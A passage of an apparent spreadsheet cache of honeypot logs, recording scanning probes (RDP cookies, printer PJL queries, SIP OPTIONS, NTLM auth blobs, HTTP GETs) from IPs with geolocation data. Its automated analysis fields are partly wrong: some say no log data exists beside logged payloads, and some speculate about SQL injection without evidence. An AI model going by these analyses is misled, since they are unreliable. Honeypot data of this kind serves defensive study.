11&amp;&amp;SMA-LAB_SNMP_H37&amp;&amp;SMA-LAB_SNMP_H25&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_POP3_H31&amp;&amp;SMA-LAB_ORACLE_H5&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_IMAP_H16&amp;&amp;SMA-LAB_FTP_H33&amp;&amp;SMA-LAB_REDIS_H47&amp;&amp;SMA-LAB_IMAP_H14&amp;&amp;SMA-LAB_SNMP_H26&amp;&amp;SMA-LAB_FTP_H12&amp;&amp;SMA-LAB_FTP_H31&amp;&amp;SMA-LAB_LDAP_H29&amp;&amp;SMA-LAB_LDAP_H6&amp;&amp;SMA-LAB_SOCKS5_H31&amp;&amp;SMA-LAB_SSH_H22&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_FTP_H35&amp;&amp;SMA-LAB_IMAP_H6&amp;&amp;SMA-LAB_ORACLE_H4&amp;&amp;SMA-LAB_LDAP_H44&amp;&amp;SMA-LAB_RDP_H19&amp;&amp;SMA-LAB_LDAP_H22&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_NTP_H3&amp;&amp;SMA-LAB_IMAP_H26&amp;&amp;SMA-LAB_IRC_H33&amp;&amp;SMA-LAB_POSTGRES_H10&amp;&amp;SMA-LAB_FTP_H44&amp;&amp;SMA-LAB_IMAP_H13&amp;&amp;SMA-LAB_SMB_H14&amp;&amp;SMA-LAB_RDP_H26&amp;&amp;SMA-LAB_RDP_H23&amp;&amp;SMA-LAB_PJL_H12&amp;&amp;SMA-LAB_PJL_H26&amp;&amp;SMA-LAB_PJL_H3&amp;&amp;SMA-LAB_IMAP_H15&amp;&amp;SMA-LAB_POSTGRES_H32&amp;&amp;SMA-LAB_MYSQL_H39&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_LDAP_H40&amp;&amp;SMA-LAB_SIP_H22&amp;&amp;SMA-LAB_IMAP_H32&amp;&amp;SMA-LAB_ORACLE_H26&amp;&amp;SMA-LAB_POSTGRES_H8&amp;&amp;SMA-LAB_FTP_H26&amp;&amp;SMA-LAB_POP3_H12&amp;&amp;SMA-LAB_ORACLE_H32&amp;&amp;SMA-LAB_SNMP_H12&amp;&amp;SMA-LAB_SIP_H38&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_NTP_H19&amp;&amp;SMA-LAB_PJL_H23&amp;&amp;SMA-LAB_REDIS_H11&amp;&amp;SMA-LAB_SNMP_H39&amp;&amp;SMA-LAB_PJL_H36&amp;&amp;SMA-LAB_PJL_H44&amp;&amp;SMA-LAB_HTTPS_H41&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_IMAP_H40&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_FTP_H7&amp;&amp;SMA-LAB_PJL_H8&amp;&amp;SMA-LAB_FTP_H5&amp;&amp;SMA-LAB_RDP_H31&amp;&amp;SMA-LAB_SMB_H15&amp;&amp;SMA-LAB_SOCKS5_H29&amp;&amp;SMA-LAB_SOCKS5_H8&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_ORACLE_H36&amp;&amp;SMA-LAB_IMAP_H8&amp;&amp;SMA-LAB_IMAP_H36&amp;&amp;SMA-LAB_SIP_H36"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;389&amp;&amp;443&amp;&amp;110&amp;&amp;6667&amp;&amp;5432&amp;&amp;23&amp;&amp;22&amp;&amp;21142&amp;&amp;143&amp;&amp;445&amp;&amp;3389&amp;&amp;1521&amp;&amp;161&amp;&amp;1080&amp;&amp;9100&amp;&amp;8443&amp;&amp;6379&amp;&amp;22&amp;&amp;29468&amp;&amp;NA&amp;&amp;3306&amp;&amp;1433&amp;&amp;21&amp;&amp;63808&amp;&amp;54778&amp;&amp;54013&amp;&amp;5900&amp;&amp;49574&amp;&amp;54686&amp;&amp;55325&amp;&amp;80&amp;&amp;56208&amp;&amp;20030&amp;&amp;56577&amp;&amp;50327&amp;&amp;58420&amp;&amp;58438&amp;&amp;58452&amp;&amp;58422"/>
    <s v="True"/>
    <s v="{'dnsbl-2.uceprotect.net': ['unknown']}"/>
    <n v="39"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3833"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="2023-09-07"/>
    <s v="PAN-22"/>
    <s v="2023-09-07"/>
    <s v="request&amp;&amp;connection&amp;&amp;NA&amp;&amp;GET&amp;&amp;query&amp;&amp;command&amp;&amp;stshash"/>
    <s v="NA&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=jjVaRDzpW'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=UyZYKe'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=vhCZBQ'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=VoKQKfEoh'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=GJNeGG'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=kYMqWo'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.123,63282)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.123,63290)}&amp;&amp;{Data_SMB:Incoming connection (147.185.132.123,63304)}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=QRojeeKgx'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=jnAkxY'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ovmrlB'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=XkmZXG'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=GnSgqikwY'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=joLWrI'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=BmPYsq'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=LxRrGGJRc'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:93b9:847b"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="Unknown POP3 activity detected, indicating possible scanning or probing attempts to exploit vulnerabilities for email account access. No actual login attempt was made as Data_POP3 is marked as NA. This could be an indication of reconnaissance before a more targeted attack. &amp;&amp; Unknown access to MySQL database, possibly an attempt to exploit or scan for vulnerabilities. _x000a_No specific query was attempted but still indicates potential malicious activity. _x000a_Could be a reconnaissance phase of a larger attack. &amp;&amp; The data suggests that an attacker is trying to access MySQL database services, possibly attempting to exploit vulnerabilities or gain unauthorized access. This could be a sign of SQL injection or brute-force attack attempts. The fact that no action has been taken (indicated by &quot;NA&quot;) implies the activity was detected but not acted upon. &amp;&amp; The system detected an attempt to access Oracle database information, suggesting unauthorized probing or reconnaissance activity. This could be a precursor to further malicious activities such as SQL injection attacks. The intent appears to be gathering sensitive database information for potential exploitation."/>
    <m/>
  </r>
  <r>
    <x v="339"/>
    <x v="339"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T21:12:19"/>
    <d v="2025-04-23T10:18:17"/>
    <d v="2025-04-29T21:12:19"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H8"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai (Pawan Baug)"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.1771"/>
    <s v="72.848"/>
    <s v="134014"/>
    <s v="NET 4 U SERVICES PVT LTD"/>
    <s v="NET 4 U SERVICES PVT LTD"/>
    <s v="business"/>
    <s v="NET 4 U Services PVT LTD"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2d7e:abaf"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No TELNET activity detected, but this is an expected result since most modern networks block or disable TELNET by default, making it unlikely for malicious actors to use it. However, the presence of a placeholder suggests that the monitoring system is keeping track of potential vulnerabilities. No indication of actual malicious behavior."/>
    <s v="Scanning Attack"/>
  </r>
  <r>
    <x v="340"/>
    <x v="340"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T21:11:42"/>
    <d v="2024-04-02T06:32:00"/>
    <d v="2025-04-29T21:11:42"/>
    <n v="289"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;SIP Email Impersonation"/>
    <s v="low"/>
    <s v="&amp;&amp;SMA-LAB_PJL_H35&amp;&amp;SMA-LAB_FTP_H12&amp;&amp;SMA-LAB_POP3_H22&amp;&amp;SMA-LAB_POP3_H32&amp;&amp;SMA-LAB_FTP_H47&amp;&amp;SMA-LAB_IMAP_H37&amp;&amp;SMA-LAB_IMAP_H27&amp;&amp;SMA-LAB_POP3_H45&amp;&amp;SMA-LAB_POP3_H6&amp;&amp;SMA-LAB_HTTPS_H46&amp;&amp;SMA-LAB_HTTPS_H15&amp;&amp;SMA-LAB_PJL_H12&amp;&amp;SMA-LAB_SIP_H11&amp;&amp;SMA-LAB_FTP_H26&amp;&amp;SMA-LAB_POP3_H15&amp;&amp;SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_PJL_H14&amp;&amp;SMA-LAB_IMAP_HC1&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_POP3_HC1&amp;&amp;SMA-LAB_HTTPS_H47&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_RDP_H40&amp;&amp;SMA-LAB_POP3_H17"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;9100&amp;&amp;21&amp;&amp;110&amp;&amp;143&amp;&amp;443&amp;&amp;NA&amp;&amp;1433&amp;&amp;23&amp;&amp;3389&amp;&amp;5432&amp;&amp;80&amp;&amp;445&amp;&amp;25&amp;&amp;3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NA"/>
    <s v="Kowloon"/>
    <s v="NA"/>
    <s v="Hong Kong"/>
    <s v="1819729"/>
    <s v="999077"/>
    <s v="22.3193"/>
    <s v="114.169"/>
    <s v="9465"/>
    <s v="AGOTOZ PTE. LTD."/>
    <s v="Agotoz HK Limited"/>
    <s v="hosting"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;request&amp;&amp;login&amp;&amp;NA&amp;&amp;query&amp;&amp;GET&amp;&amp;command"/>
    <s v="NA&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.213;rport=1787'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 5.182.38.84:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '185.74.222.213:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 38.54.116.162:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.213;rport=25111'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 38.54.116.162:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'User-Agent': 'NTRIP GNSSInternetRadio', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '38.60.171.39:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.213,62532)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (qvRauTTa,)}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'HELP', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'NTLM', 'command': 'AUTH', 'data': 'TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA='}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 94.131.8.76:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '156.244.37.11:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 185.74.222.213:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '209.145.61.177:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 185.74.222.213:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.213,4182)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (lEXJnjds,)}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.213;rport=21170'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9ad4:8dd5"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low&amp;&amp;Medium"/>
    <s v="There is insufficient log data provided to analyze any potential malicious activity."/>
    <s v="There doesn't seem to be any log data provided. Please provide the actual log data for analysis. _x000a__x000a_Once you provide the data, I can help with identifying the type of attack based on the analysis."/>
  </r>
  <r>
    <x v="341"/>
    <x v="341"/>
    <s v="24-117-31-54.cpe.sparklight.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T21:10:52"/>
    <d v="2025-03-23T02:33:47"/>
    <d v="2025-04-29T21:10:52"/>
    <n v="30"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H8"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="ND"/>
    <s v="North Dakota"/>
    <s v="Cass"/>
    <s v="Fargo"/>
    <s v="5059163"/>
    <s v="58103"/>
    <s v="46.8647"/>
    <s v="-96.8263"/>
    <s v="11492"/>
    <s v="CABLE ONE, INC."/>
    <s v="CABLE ONE, INC."/>
    <s v="residential"/>
    <s v="Sparklight"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:1875:1f36"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <s v="There is insufficient information for analysis."/>
    <s v="I don't have any log data to analyze. Please provide the actual log data for me to help with identifying the types of attacks."/>
  </r>
  <r>
    <x v="342"/>
    <x v="342"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T21:10:41"/>
    <d v="2024-04-02T06:32:00"/>
    <d v="2025-04-29T21:10:41"/>
    <n v="281"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_HTTPS_H7&amp;&amp;SMA-LAB_SSH_H20&amp;&amp;SMA-LAB_MYSQL_H15&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_PJL_H13&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_IMAP_H17&amp;&amp;SMA-LAB_POP3_H22&amp;&amp;SMA-LAB_SIP_H39&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_POP3_H38&amp;&amp;SMA-LAB_PJL_H39&amp;&amp;SMA-LAB_RDP_H35&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_POP3_H6&amp;&amp;SMA-LAB_IMAP_H45&amp;&amp;SMA-LAB_POP3_H31&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_SIP_H9&amp;&amp;SMA-LAB_POSTGRES_H35&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_POP3_H13"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;3306&amp;&amp;443&amp;&amp;22&amp;&amp;23&amp;&amp;9100&amp;&amp;143&amp;&amp;110&amp;&amp;NA&amp;&amp;80&amp;&amp;3389&amp;&amp;8443&amp;&amp;5432&amp;&amp;25&amp;&amp;21&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NA"/>
    <s v="Kowloon"/>
    <s v="NA"/>
    <s v="Hong Kong"/>
    <s v="1819729"/>
    <s v="999077"/>
    <s v="22.3193"/>
    <s v="114.169"/>
    <s v="9465"/>
    <s v="AGOTOZ PTE. LTD."/>
    <s v="Agotoz HK Limited"/>
    <s v="hosting"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;command&amp;&amp;login&amp;&amp;request&amp;&amp;query&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.209;rport=55087'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'HELP', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'NTLM', 'command': 'AUTH', 'data': 'TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA='}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 122.170.7.108:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 194.4.48.242:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'User-Agent': 'NTRIP GNSSInternetRadio', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '149.102.153.168:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '144.126.148.5:80', 'method': 'GET', 'uri': '/version'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '144.126.148.5:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '144.126.148.5:80', 'method': 'GET', 'uri': '/v1'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9ad4:8dd1"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="An attempt was made to access an IMAP service, which could be a reconnaissance or scanning activity by an attacker, likely part of a larger malicious operation. This may indicate that the system is being scanned for vulnerabilities or tested for open services. The lack of a specific action taken suggests this might be an initial probing step. &amp;&amp; Attempt to connect to database service without authentication information provided. _x000a_No valid credentials sent, potentially indicating brute force or unauthorized access attempt. _x000a_May be an indication of malicious activity targeting database vulnerabilities."/>
    <s v="Port scan"/>
  </r>
  <r>
    <x v="343"/>
    <x v="343"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T21:10:23"/>
    <d v="2024-04-02T06:33:00"/>
    <d v="2025-04-29T21:10:23"/>
    <n v="266"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Credential Stuffing&amp;&amp;Encryption Misuse&amp;&amp;Reconnaissance"/>
    <s v="low"/>
